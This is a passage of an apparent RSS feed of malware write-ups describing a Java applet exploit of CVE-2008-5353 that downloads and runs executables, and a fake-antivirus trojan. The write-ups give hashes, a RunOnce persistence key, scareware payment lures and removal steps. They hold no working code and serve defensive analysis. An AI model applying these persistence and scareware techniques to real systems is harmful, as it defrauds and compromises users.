&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;The malicious program is an exploit, which uses vulnerability in Sun Java JRE and JDK to download files from the Internet and to execute them on the infected machine. It consists of three Java-classes (class-files).These files sizes are 12,447; 3,047 and 3,158 bytes.
&lt;/p&gt;&lt;p&gt;MD5: B27FAF4A90CAEF7441BD0B912BB08A0A 
&lt;/p&gt;&lt;p&gt;SHA1: B2F11840E1C315D1D7BA82CA1F4FAF39B0C0098D 
&lt;/p&gt;&lt;p&gt;MD5: 8D36BDBFB548E1196E7CEA669428B2DD 
&lt;/p&gt;&lt;p&gt;SHA1: 9D49C8347E4FCE75FF34F2BB452A9A07C3439848
&lt;/p&gt;&lt;p&gt;MD5: 63D23DA6EA900A12A0139BC5B1B56F8F
&lt;/p&gt;&lt;p&gt;SHA1: 195F0303A1B9E22D82919BA7DFE83AD90B4565A5
&lt;/p&gt;&lt;p&gt;&lt;br /&gt;
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;The malware is implemented by three classes with the following names: 
&lt;/p&gt;
&lt;pre&gt;
Changes
MyBuilds
MyFiles
&lt;/pre&gt;
&lt;p&gt;Once launched, the trojan exploits the vulnerability &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5353" class="external text"&gt;CVE-2008-5353&lt;/a&gt;. JDK and JRE 6.0 Update 10 and earlier are affected by this vulnerability. The vulnerability occurs during deserialization of "Calendar" objects in Sun Java VM and allows remote attackers to run untrusted applets and applications in a privileged context. Then the exploit downloads a file from passed URL. This file is launched after the successful download. The downloaded file is stored under random name in the temporary folder of the current user "%Temp%":
&lt;/p&gt;
&lt;pre&gt;%Temp%\&amp;lt;rnd&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;where &amp;lt;rnd&amp;gt; - random fractional decimal number from 0 to 1. The file will not be downloaded if the operating system installed on victim's computer is not Windows.
&lt;/p&gt;&lt;p&gt;The malware is a Java-applet. It is launched from an infected HTML-page by using the "&amp;lt;APPLET&amp;gt;" tag. URL is passed to malicious applet as the tag parameters "data" and "cc". The parameter "cc" specifies the number of iterations of downloading cycle. The URL to download each file is composed as follows:
&lt;/p&gt;
&lt;pre&gt;URL = data + i,
&lt;/pre&gt;
&lt;p&gt;where URL - link to download the next file;
&lt;/p&gt;&lt;p&gt;data - the value of tag parameter "data";
&lt;/p&gt;&lt;p&gt;i - integer decimal number, 0 &amp;lt;= i &amp;lt; cc;
&lt;/p&gt;&lt;p&gt;cc - the value of tag parameter "cc".
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_Instructions"&gt;Removal Instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:
&lt;/p&gt;&lt;p&gt;1. Update Sun Java JRE and JDK to the latest versions.
&lt;/p&gt;&lt;p&gt;2. Delete the following files:
&lt;/p&gt;
&lt;pre&gt;%Temp%\&amp;lt;rnd&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;3. Clear the Temporary Internet Files directory, which may contain infected files.
&lt;/p&gt;&lt;p&gt;4. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sat, 02 Apr 2011 23:26:43 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Exploit.Java.Agent.ca</guid>
		</item>
		<item>
			<title>Trojan.Win32.FakeAV.doq</title>
			<link>http://www.totalmalwareinfo.com/eng/Trojan.Win32.FakeAV.doq</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;It is a trojan that imitates the work of anti-virus program for the purpose of obtaining the user fee for the detection and removal of non-existent threats. It is a Windows application (PE-EXE file). Its size is 1,039,872 bytes. It is written in C++.
&lt;/p&gt;&lt;p&gt;MD5: D7F29FBD718066B0112AF79FDC656D67
&lt;/p&gt;&lt;p&gt;SHA1: BD796ED40EC3AAB01A36E97D46F47377A0028917
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Installation"&gt;Installation&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched, the trojan moves its original file and saves it as
&lt;/p&gt;
&lt;pre&gt;%USERPROFILE%\Local Settings\Application Data\&amp;lt;rnd&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;here &amp;lt;rnd&amp;gt; - a random decimal number.
&lt;/p&gt;&lt;p&gt;After every launch the trojan creates the following registry key: 
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
&amp;quot;&amp;lt;the original trojan file's name&amp;gt;&amp;quot; = &amp;quot;%USERPROFILE%\Local Settings\Application Data\&amp;lt;rnd&amp;gt;.exe&amp;quot;
&lt;/pre&gt;
&lt;p&gt;It allows the trojan to automatically start its executable every time you start the system.
&lt;/p&gt;&lt;p&gt;In addition, the trojan creates the shortcut:
&lt;/p&gt;
&lt;pre&gt;%USERPROFILE%\Start Menu\Programs\Security Tool.lnk
&lt;/pre&gt;
&lt;p&gt;It refers to the item:
&lt;/p&gt;
&lt;pre&gt;%USERPROFILE%\Local Settings\Application Data\&amp;lt;rnd&amp;gt;.exe
&lt;/pre&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched, the trojan simulates the process of scanning victim's computer file system, thus displaying the information about the presence of non-existent threats:
&lt;/p&gt;
&lt;div class="center"&gt;&lt;div class="floatnone"&gt;&lt;a href="http://www.totalmalwareinfo.com/eng/File:FakeAV.doq_1.png" class="image"&gt;&lt;img alt="FakeAV.doq 1.png" src="http://www.totalmalwareinfo.com/en/images/1/14/FakeAV.doq_1.png" width="749" height="559" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;
&lt;div class="center"&gt;&lt;div class="floatnone"&gt;&lt;a href="http://www.totalmalwareinfo.com/eng/File:FakeAV.doq_2.png" class="image"&gt;&lt;img alt="FakeAV.doq 2.png" src="http://www.totalmalwareinfo.com/en/images/f/f0/FakeAV.doq_2.png" width="477" height="397" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;
&lt;div class="center"&gt;&lt;div class="floatnone"&gt;&lt;a href="http://www.totalmalwareinfo.com/eng/File:FakeAV.doq_3.png" class="image"&gt;&lt;img alt="FakeAV.doq 3.png" src="http://www.totalmalwareinfo.com/en/images/5/5b/FakeAV.doq_3.png" width="415" height="336" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;When you try to remove the displayed threats, the trojan will offer you to pass the activation:
&lt;/p&gt;
&lt;div class="center"&gt;&lt;div class="floatnone"&gt;&lt;a href="http://www.totalmalwareinfo.com/eng/File:FakeAV.doq_4.png" class="image"&gt;&lt;img alt="FakeAV.doq 4.png" src="http://www.totalmalwareinfo.com/en/images/d/df/FakeAV.doq_4.png" width="420" height="297" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;Then the sites containing webforms for entering user's credit card data will be displayed:
&lt;/p&gt;
&lt;pre&gt;
defen*****ymentgate.com
secu*****soft.com
&lt;/pre&gt;
&lt;p&gt;The trojan blocks the launch of new processes in system. When the new process is found, it will be terminated, and the following window will be displayed:
&lt;/p&gt;
&lt;div class="center"&gt;&lt;div class="floatnone"&gt;&lt;a href="http://www.totalmalwareinfo.com/eng/File:FakeAV.doq_5.png" class="image"&gt;&lt;img alt="FakeAV.doq 5.png" src="http://www.totalmalwareinfo.com/en/images/f/f2/FakeAV.doq_5.png" width="450" height="178" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;For example:
&lt;/p&gt;
&lt;div class="center"&gt;&lt;div class="floatnone"&gt;&lt;a href="http://www.totalmalwareinfo.com/eng/File:FakeAV.doq_6.png" class="image"&gt;&lt;img alt="FakeAV.doq 6.png" src="http://www.totalmalwareinfo.com/en/images/2/2f/FakeAV.doq_6.png" width="448" height="178" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;The trojan displays the following messages in the taskbar notification area:
&lt;/p&gt;
&lt;div class="center"&gt;&lt;div class="floatnone"&gt;&lt;a href="http://www.totalmalwareinfo.com/eng/File:FakeAV.doq_7.png" class="image"&gt;&lt;img alt="FakeAV.doq 7.png" src="http://www.totalmalwareinfo.com/en/images/d/d2/FakeAV.doq_7.png" width="324" height="126" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;
&lt;div class="center"&gt;&lt;div class="floatnone"&gt;&lt;a href="http://www.totalmalwareinfo.com/eng/File:FakeAV.doq_8.png" class="image"&gt;&lt;img alt="FakeAV.doq 8.png" src="http://www.totalmalwareinfo.com/en/images/c/c0/FakeAV.doq_8.png" width="327" height="126" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;
&lt;div class="center"&gt;&lt;div class="floatnone"&gt;&lt;a href="http://www.totalmalwareinfo.com/eng/File:FakeAV.doq_9.png" class="image"&gt;&lt;img alt="FakeAV.doq 9.png" src="http://www.totalmalwareinfo.com/en/images/5/5d/FakeAV.doq_9.png" width="325" height="114" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;The trojan also may display the message about the availability of database updates:
&lt;/p&gt;
&lt;div class="center"&gt;&lt;div class="floatnone"&gt;&lt;a href="http://www.totalmalwareinfo.com/eng/File:FakeAV.doq_10.png" class="image"&gt;&lt;img alt="FakeAV.doq 10.png" src="http://www.totalmalwareinfo.com/en/images/b/bf/FakeAV.doq_10.png" width="371" height="310" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;In addition, the trojan connects to the following address:
&lt;/p&gt;
&lt;pre&gt;212.150.***.202
&lt;/pre&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_Instructions"&gt;Removal Instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:
&lt;/p&gt;&lt;p&gt;1. Restart the computer in "Safe Mode" (at the beginning of loading press and hold «F8», then select «Safe Mode» at the Windows boot menu).
&lt;/p&gt;&lt;p&gt;2. Delete the following files:
&lt;/p&gt;
&lt;pre&gt;
%USERPROFILE%\Local Settings\Application Data\&amp;lt;rnd&amp;gt;.exe
%USERPROFILE%\Start Menu\Programs\Security Tool.lnk
&lt;/pre&gt;
&lt;p&gt;3. Delete the system registry key:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
&amp;quot;&amp;lt;the original trojan file's name&amp;gt;&amp;quot; = &amp;quot;%USERPROFILE%\Local Settings\Application Data\&amp;lt;rnd&amp;gt;.exe&amp;quot;
&lt;/pre&gt;
&lt;p&gt;4. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sun, 27 Mar 2011 22:50:10 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Trojan.Win32.FakeAV.doq</guid>
		</item>
	</channel>
</rss>

